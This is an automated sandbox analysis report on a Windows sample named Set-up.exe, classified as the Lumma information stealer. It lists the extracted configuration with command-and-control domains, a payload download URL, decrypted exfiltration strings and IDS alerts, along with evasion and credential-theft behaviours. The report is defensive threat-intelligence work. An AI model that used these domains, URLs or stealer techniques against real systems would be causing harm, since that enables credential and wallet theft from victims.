Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Set-up.exe

Overview

General Information

Sample name:Set-up.exe
Analysis ID:1551389
MD5:206d3ede48db6abcd0887aab3442a590
SHA1:8fcb9af4c1c4bb3af65aa5da2e12d9256b038e9e
SHA256:835a32a57441be4b9f8861e80dd7a70c724c5024743d84fea0db6de46635e449
Tags:exelummaLummaStealerstealeruser-infosecn1nja
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
C2 URLs / IPs found in malware configuration
Contains functionality to prevent local Windows debugging
Found many strings related to Crypto-Wallets (likely being stolen)
LummaC encrypted strings found
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Creates a DirectInput object (often for capturing keystrokes)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE / OLE file has an invalid certificate
PE file contains executable resources (Code or Archives)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • Set-up.exe (PID: 6544 cmdline: "C:\Users\user\Desktop\Set-up.exe" MD5: 206D3EDE48DB6ABCD0887AAB3442A590)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["nightybinybz.shop", "moutheventushz.shop", "mutterissuen.shop", "conceszustyb.shop", "bakedstusteeb.shop", "standartedby.shop", "worddosofrm.shop", "corehairydu.icu", "respectabosiz.shop"], "Build id": "BVnUqo--@aboba45"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000000.00000002.2074330703.0000000005470000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Donutloader_f40e3759unknownunknown
    • 0x503a5:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
    Process Memory Space: Set-up.exe PID: 6544JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      Process Memory Space: Set-up.exe PID: 6544JoeSecurity_LummaCStealerYara detected LummaC StealerJoe Security
        decrypted.memstrJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security

          Sigma Signatures

          No Sigma rule has matched

          Suricata Signatures

          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-11-07T17:39:24.473718+010020229301A Network Trojan was detected20.109.210.53443192.168.2.449735TCP
          2024-11-07T17:39:45.689040+010020229301A Network Trojan was detected52.149.20.212443192.168.2.456314TCP
          2024-11-07T17:39:47.147971+010020229301A Network Trojan was detected52.149.20.212443192.168.2.456315TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-11-07T17:39:20.512582+010020283713Unknown Traffic192.168.2.449733104.21.16.142443TCP
          2024-11-07T17:39:22.136265+010020283713Unknown Traffic192.168.2.449734104.21.16.142443TCP
          2024-11-07T17:39:23.780419+010020283713Unknown Traffic192.168.2.449736104.21.16.142443TCP
          2024-11-07T17:39:25.179012+010020283713Unknown Traffic192.168.2.449740104.21.16.142443TCP
          2024-11-07T17:39:26.832488+010020283713Unknown Traffic192.168.2.449742104.21.16.142443TCP
          2024-11-07T17:39:28.750013+010020283713Unknown Traffic192.168.2.449744104.21.16.142443TCP
          2024-11-07T17:39:30.232631+010020283713Unknown Traffic192.168.2.449745104.21.16.142443TCP
          2024-11-07T17:39:31.980700+010020283713Unknown Traffic192.168.2.449746104.21.16.142443TCP
          2024-11-07T17:39:33.402164+010020283713Unknown Traffic192.168.2.449747104.21.16.142443TCP
          2024-11-07T17:39:35.031255+010020283713Unknown Traffic192.168.2.449748104.21.16.142443TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-11-07T17:39:21.047264+010020546531A Network Trojan was detected192.168.2.449733104.21.16.142443TCP
          2024-11-07T17:39:22.807473+010020546531A Network Trojan was detected192.168.2.449734104.21.16.142443TCP
          2024-11-07T17:39:35.377073+010020546531A Network Trojan was detected192.168.2.449748104.21.16.142443TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-11-07T17:39:21.047264+010020498361A Network Trojan was detected192.168.2.449733104.21.16.142443TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-11-07T17:39:22.807473+010020498121A Network Trojan was detected192.168.2.449734104.21.16.142443TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-11-07T17:39:20.512582+010020572701Domain Observed Used for C2 Detected192.168.2.449733104.21.16.142443TCP
          2024-11-07T17:39:22.136265+010020572701Domain Observed Used for C2 Detected192.168.2.449734104.21.16.142443TCP
          2024-11-07T17:39:23.780419+010020572701Domain Observed Used for C2 Detected192.168.2.449736104.21.16.142443TCP
          2024-11-07T17:39:25.179012+010020572701Domain Observed Used for C2 Detected192.168.2.449740104.21.16.142443TCP
          2024-11-07T17:39:26.832488+010020572701Domain Observed Used for C2 Detected192.168.2.449742104.21.16.142443TCP
          2024-11-07T17:39:28.750013+010020572701Domain Observed Used for C2 Detected192.168.2.449744104.21.16.142443TCP
          2024-11-07T17:39:30.232631+010020572701Domain Observed Used for C2 Detected192.168.2.449745104.21.16.142443TCP
          2024-11-07T17:39:31.980700+010020572701Domain Observed Used for C2 Detected192.168.2.449746104.21.16.142443TCP
          2024-11-07T17:39:33.402164+010020572701Domain Observed Used for C2 Detected192.168.2.449747104.21.16.142443TCP
          2024-11-07T17:39:35.031255+010020572701Domain Observed Used for C2 Detected192.168.2.449748104.21.16.142443TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-11-07T17:39:19.871748+010020572691Domain Observed Used for C2 Detected192.168.2.4571081.1.1.153UDP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-11-07T17:39:30.721297+010020480941Malware Command and Control Activity Detected192.168.2.449745104.21.16.142443TCP

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Antivirus detection for URL or domain
          Source: https://worddosofrm.shop/;8rAvira URL Cloud: Label: malware
          Source: https://worddosofrm.shop/?Avira URL Cloud: Label: malware
          Source: https://worddosofrm.shop/apierAvira URL Cloud: Label: malware
          Source: https://worddosofrm.shop:443/api2o4p.default-release/key4.dbPKAvira URL Cloud: Label: malware
          Source: https://worddosofrm.shop/OAvira URL Cloud: Label: malware
          Source: http://147.45.47.81/conhost.exeAvira URL Cloud: Label: malware
          Source: https://worddosofrm.shop/:Avira URL Cloud: Label: malware
          Source: https://worddosofrm.shop/8Avira URL Cloud: Label: malware
          Source: https://worddosofrm.shop/Avira URL Cloud: Label: malware
          Source: https://worddosofrm.shop/apibuAvira URL Cloud: Label: malware
          Source: https://worddosofrm.shop/$Avira URL Cloud: Label: malware
          Source: https://worddosofrm.shop:443/apiAvira URL Cloud: Label: malware
          Source: http://147.45.47.81:80/conhost.exeAvira URL Cloud: Label: malware
          Source: https://worddosofrm.shop/apisAvira URL Cloud: Label: malware
          Source: https://worddosofrm.shop:443/api9Avira URL Cloud: Label: malware
          Source: https://worddosofrm.shop/apiAvira URL Cloud: Label: malware
          Found malware configuration
          Source: Set-up.exe.6544.0.memstrminMalware Configuration Extractor: LummaC {"C2 url": ["nightybinybz.shop", "moutheventushz.shop", "mutterissuen.shop", "conceszustyb.shop", "bakedstusteeb.shop", "standartedby.shop", "worddosofrm.shop", "corehairydu.icu", "respectabosiz.shop"], "Build id": "BVnUqo--@aboba45"}
          Multi AV Scanner detection for submitted file
          Source: Set-up.exeReversingLabs: Detection: 31%
          Sample uses string decryption to hide its real strings
          Source: 00000000.00000002.2074330703.0000000005470000.00000040.00001000.00020000.00000000.sdmpString decryptor: moutheventushz.shop
          Source: 00000000.00000002.2074330703.0000000005470000.00000040.00001000.00020000.00000000.sdmpString decryptor: respectabosiz.shop
          Source: 00000000.00000002.2074330703.0000000005470000.00000040.00001000.00020000.00000000.sdmpString decryptor: bakedstusteeb.shop
          Source: 00000000.00000002.2074330703.0000000005470000.00000040.00001000.00020000.00000000.sdmpString decryptor: conceszustyb.shop
          Source: 00000000.00000002.2074330703.0000000005470000.00000040.00001000.00020000.00000000.sdmpString decryptor: nightybinybz.shop
          Source: 00000000.00000002.2074330703.0000000005470000.00000040.00001000.00020000.00000000.sdmpString decryptor: standartedby.shop
          Source: 00000000.00000002.2074330703.0000000005470000.00000040.00001000.00020000.00000000.sdmpString decryptor: mutterissuen.shop
          Source: 00000000.00000002.2074330703.0000000005470000.00000040.00001000.00020000.00000000.sdmpString decryptor: worddosofrm.shop
          Source: 00000000.00000002.2074330703.0000000005470000.00000040.00001000.00020000.00000000.sdmpString decryptor: corehairydu.icu
          Source: 00000000.00000002.2074330703.0000000005470000.00000040.00001000.00020000.00000000.sdmpString decryptor: lid=%s&j=%s&ver=4.0
          Source: 00000000.00000002.2074330703.0000000005470000.00000040.00001000.00020000.00000000.sdmpString decryptor: TeslaBrowser/5.5
          Source: 00000000.00000002.2074330703.0000000005470000.00000040.00001000.00020000.00000000.sdmpString decryptor: - Screen Resoluton:
          Source: 00000000.00000002.2074330703.0000000005470000.00000040.00001000.00020000.00000000.sdmpString decryptor: - Physical Installed Memory:
          Source: 00000000.00000002.2074330703.0000000005470000.00000040.00001000.00020000.00000000.sdmpString decryptor: Workgroup: -
          Source: 00000000.00000002.2074330703.0000000005470000.00000040.00001000.00020000.00000000.sdmpString decryptor: BVnUqo--@aboba45
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00E45980 InterlockedExchange,SwitchToThread,InterlockedExchange,InterlockedExchangeAdd,CryptAcquireContextA,InterlockedIncrement,GetLastError,0_2_00E45980
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00E45B40 InterlockedExchange,SwitchToThread,InterlockedExchange,InterlockedExchangeAdd,InterlockedDecrement,CryptReleaseContext,0_2_00E45B40
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00E45C00 InterlockedExchangeAdd,CryptGenRandom,GetLastError,0_2_00E45C00
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_058F841D CryptUnprotectData,0_2_058F841D
          Source: Set-up.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: unknownHTTPS traffic detected: 104.21.16.142:443 -> 192.168.2.4:49733 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.21.16.142:443 -> 192.168.2.4:49734 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.21.16.142:443 -> 192.168.2.4:49736 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.21.16.142:443 -> 192.168.2.4:49740 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.21.16.142:443 -> 192.168.2.4:49742 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.21.16.142:443 -> 192.168.2.4:49744 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.21.16.142:443 -> 192.168.2.4:49745 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.21.16.142:443 -> 192.168.2.4:49746 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.21.16.142:443 -> 192.168.2.4:49747 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.21.16.142:443 -> 192.168.2.4:49748 version: TLS 1.2
          Source: Set-up.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
          Source: Binary string: D:\Temp\BuildTemp\1.18_Windows_BUILD\ppsspp\PPSSPPWindows.pdb source: Set-up.exe
          Source: Binary string: D:\repos\main\SSH2\Release\pdbs\BvSshUpdate.pdb source: Set-up.exe
          Source: Binary string: updater.exe.pdb source: Set-up.exe
          Source: Binary string: D:\Temp\BuildTemp\1.18_Windows_BUILD\ppsspp\PPSSPPWindows.pdb& source: Set-up.exe
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 4x nop then mov word ptr [eax], cx0_2_05491548
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 4x nop then movzx edx, byte ptr [esi+edi]0_2_054765C8
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax]0_2_054AB5E8
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 4x nop then cmp dword ptr [edx+ecx*8], 9ABDB589h0_2_054AB5E8
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], B282C971h0_2_05493588
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax-2D27A64Ah]0_2_0548A58F
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 4x nop then mov ecx, eax0_2_0548F438
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 4x nop then mov ebx, edx0_2_054AB4E8
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 4x nop then cmp dword ptr [ecx+edi*8], DD26B4F7h0_2_054B2718
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 4x nop then movzx edx, word ptr [ecx+eax]0_2_0548E7E8
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 4x nop then movzx edx, byte ptr [esi+ebx]0_2_05477618
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 4x nop then mov word ptr [edi], ax0_2_0547F6D8
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 4x nop then movsx esi, byte ptr [ebx+ecx+60h]0_2_0547F6D8
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 4x nop then cmp dword ptr [edi+ebp*8], C81E0BF6h0_2_054B2108
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 4x nop then movzx eax, byte ptr [esp+edi+0Ch]0_2_0547F1F8
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 4x nop then cmp al, 5Ch0_2_05478068
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 4x nop then cmp word ptr [edi+ebx+02h], 0000h0_2_054B2358
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 4x nop then mov dword ptr [esi], ebx0_2_05483330
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 4x nop then mov ecx, eax0_2_0549A3A8
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 4x nop then cmp dword ptr [edi+ebp*8], 7E66A1B5h0_2_054B2238
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 4x nop then movzx esi, byte ptr [esp+ebx]0_2_054AC2D8
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 4x nop then mov edx, ecx0_2_05493D18
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 4x nop then mov edx, eax0_2_05492D28
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax+64D99780h]0_2_0548AF0F
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 4x nop then cmp dword ptr [ebp+ebx*8+00h], 3E416E49h0_2_054ACF98
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], BA50DEFCh0_2_054ABFB8
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 4x nop then mov ebp, eax0_2_0547BE68
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 4x nop then cmp dword ptr [ebx+edx*8], 50DC24C7h0_2_054B1EE8
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 4x nop then mov dword ptr [0044B084h], esi0_2_0547FEF7
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], B62B8D10h0_2_05494918
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 4x nop then cmp dword ptr [edx+ecx*8], 3602324Eh0_2_054B29D8
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 4x nop then add eax, dword ptr [esp+ecx*4+2Ch]0_2_0547D9F8
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 4x nop then movzx ecx, word ptr [ebp+edi*4+00h]0_2_0547D9F8
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 4x nop then movzx esi, byte ptr [esp+edx+78h]0_2_054949AE
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 4x nop then cmp word ptr [edi+eax+02h], 0000h0_2_0548D850
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 4x nop then mov dword ptr [esp+04h], 79E17BB6h0_2_0548D850
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 4x nop then mov dword ptr [eax+ebx], 30303030h0_2_05472878
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 4x nop then mov dword ptr [eax+ebx], 20202020h0_2_05472878
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 4x nop then movzx edx, byte ptr [edi+eax-02h]0_2_05483887
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 4x nop then mov ebx, eax0_2_05483887
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], B62B8D10h0_2_054ABA28
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], 89C57E52h0_2_054AFA38
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 4x nop then movzx ecx, byte ptr [esp+edx-3C436843h]0_2_054AFA38
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 4x nop then cmp word ptr [ebp+edi+02h], 0000h0_2_05492AC8
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 4x nop then movzx edx, byte ptr [ecx+esi]0_2_05478AC8
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 4x nop then mov ecx, dword ptr [esp+0Ch]0_2_05472AEF
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 4x nop then mov edx, ecx0_2_059024A0
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 4x nop then cmp dword ptr [ebx+edx*8], 50DC24C7h0_2_05920670
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 4x nop then movzx edx, byte ptr [edi+eax-02h]0_2_058F200F
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 4x nop then mov ebx, eax0_2_058F200F
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax]0_2_05919D70
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 4x nop then cmp dword ptr [edx+ecx*8], 9ABDB589h0_2_05919D70
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 4x nop then cmp dword ptr [edi+ebp*8], C81E0BF6h0_2_05920890
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 4x nop then cmp word ptr [edi+ebx+02h], 0000h0_2_05920AE0
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 4x nop then mov ebp, eax0_2_058EA5F0
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 4x nop then mov edx, eax0_2_059014B0
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 4x nop then cmp al, 5Ch0_2_058E67F0
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 4x nop then cmp dword ptr [ebp+ebx*8+00h], 3E416E49h0_2_0591B720
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], BA50DEFCh0_2_0591A740
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax+64D99780h]0_2_058F9697
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]0_2_05909620
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 4x nop then mov dword ptr [0592B084h], esi0_2_058EE67F
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 4x nop then add eax, dword ptr [esp+ecx*4+2Ch]0_2_058EC180
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 4x nop then movzx ecx, word ptr [ebp+edi*4+00h]0_2_058EC180
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], B62B8D10h0_2_0591A1B0
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], 89C57E52h0_2_0591E1C0
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 4x nop then movzx ecx, byte ptr [esp+edx-3C436843h]0_2_0591E1C0
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 4x nop then movzx esi, byte ptr [esp+edx+78h]0_2_05903136
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 4x nop then cmp dword ptr [edx+ecx*8], 3602324Eh0_2_05921160
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], B62B8D10h0_2_059030A0
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 4x nop then mov dword ptr [eax+ebx], 30303030h0_2_058E1000
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 4x nop then mov dword ptr [eax+ebx], 20202020h0_2_058E1000
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 4x nop then cmp word ptr [ebp+edi+02h], 0000h0_2_05901250
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 4x nop then movzx edx, byte ptr [ecx+esi]0_2_058E7250
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 4x nop then mov ecx, dword ptr [esp+0Ch]0_2_058E1277
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 4x nop then movzx edx, byte ptr [esi+ebx]0_2_058E5DA0
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], B282C971h0_2_05901D10
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax-2D27A64Ah]0_2_058F8D17
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 4x nop then movzx edx, byte ptr [esi+edi]0_2_058E4D50
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 4x nop then mov word ptr [eax], cx0_2_058FFCD0
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 4x nop then mov ebx, edx0_2_05919C70
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 4x nop then cmp word ptr [edi+eax+02h], 0000h0_2_058FBFD8
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 4x nop then mov dword ptr [esp+04h], 79E17BB6h0_2_058FBFD8
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 4x nop then inc edi0_2_05904F56
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 4x nop then movzx edx, word ptr [ecx+eax]0_2_058FCF70
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 4x nop then cmp dword ptr [ecx+edi*8], DD26B4F7h0_2_05920EA0
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 4x nop then jmp eax0_2_05906E18
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 4x nop then jmp dword ptr [05927E04h]0_2_05906E3C
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 4x nop then mov word ptr [edi], ax0_2_058EDE60
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 4x nop then movsx esi, byte ptr [ebx+ecx+60h]0_2_058EDE60
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 4x nop then movzx eax, byte ptr [esp+edi+0Ch]0_2_058ED980
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 4x nop then cmp dword ptr [edi+ebp*8], 7E66A1B5h0_2_059209C0
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 4x nop then mov word ptr [ebx], ax0_2_0590596B
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 4x nop then mov ecx, eax0_2_058FDBC0
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 4x nop then mov ecx, eax0_2_05908B30
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 4x nop then mov dword ptr [esi], ebx0_2_058F1AB8
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 4x nop then mov edx, ebp0_2_05905AF4
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 4x nop then movzx esi, byte ptr [esp+ebx]0_2_0591AA60

          Networking

          barindex
          Suricata IDS alerts for network traffic
          Source: Network trafficSuricata IDS: 2057270 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (worddosofrm .shop in TLS SNI) : 192.168.2.4:49742 -> 104.21.16.142:443
          Source: Network trafficSuricata IDS: 2057270 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (worddosofrm .shop in TLS SNI) : 192.168.2.4:49734 -> 104.21.16.142:443
          Source: Network trafficSuricata IDS: 2057269 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (worddosofrm .shop) : 192.168.2.4:57108 -> 1.1.1.1:53
          Source: Network trafficSuricata IDS: 2057270 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (worddosofrm .shop in TLS SNI) : 192.168.2.4:49747 -> 104.21.16.142:443
          Source: Network trafficSuricata IDS: 2057270 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (worddosofrm .shop in TLS SNI) : 192.168.2.4:49745 -> 104.21.16.142:443
          Source: Network trafficSuricata IDS: 2057270 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (worddosofrm .shop in TLS SNI) : 192.168.2.4:49748 -> 104.21.16.142:443
          Source: Network trafficSuricata IDS: 2057270 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (worddosofrm .shop in TLS SNI) : 192.168.2.4:49733 -> 104.21.16.142:443
          Source: Network trafficSuricata IDS: 2057270 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (worddosofrm .shop in TLS SNI) : 192.168.2.4:49740 -> 104.21.16.142:443
          Source: Network trafficSuricata IDS: 2057270 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (worddosofrm .shop in TLS SNI) : 192.168.2.4:49736 -> 104.21.16.142:443
          Source: Network trafficSuricata IDS: 2057270 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (worddosofrm .shop in TLS SNI) : 192.168.2.4:49744 -> 104.21.16.142:443
          Source: Network trafficSuricata IDS: 2057270 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (worddosofrm .shop in TLS SNI) : 192.168.2.4:49746 -> 104.21.16.142:443
          Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49733 -> 104.21.16.142:443
          Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49733 -> 104.21.16.142:443
          Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49734 -> 104.21.16.142:443
          Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49734 -> 104.21.16.142:443
          Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49745 -> 104.21.16.142:443
          Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49748 -> 104.21.16.142:443
          C2 URLs / IPs found in malware configuration
          Source: Malware configuration extractorURLs: nightybinybz.shop
          Source: Malware configuration extractorURLs: moutheventushz.shop
          Source: Malware configuration extractorURLs: mutterissuen.shop
          Source: Malware configuration extractorURLs: conceszustyb.shop
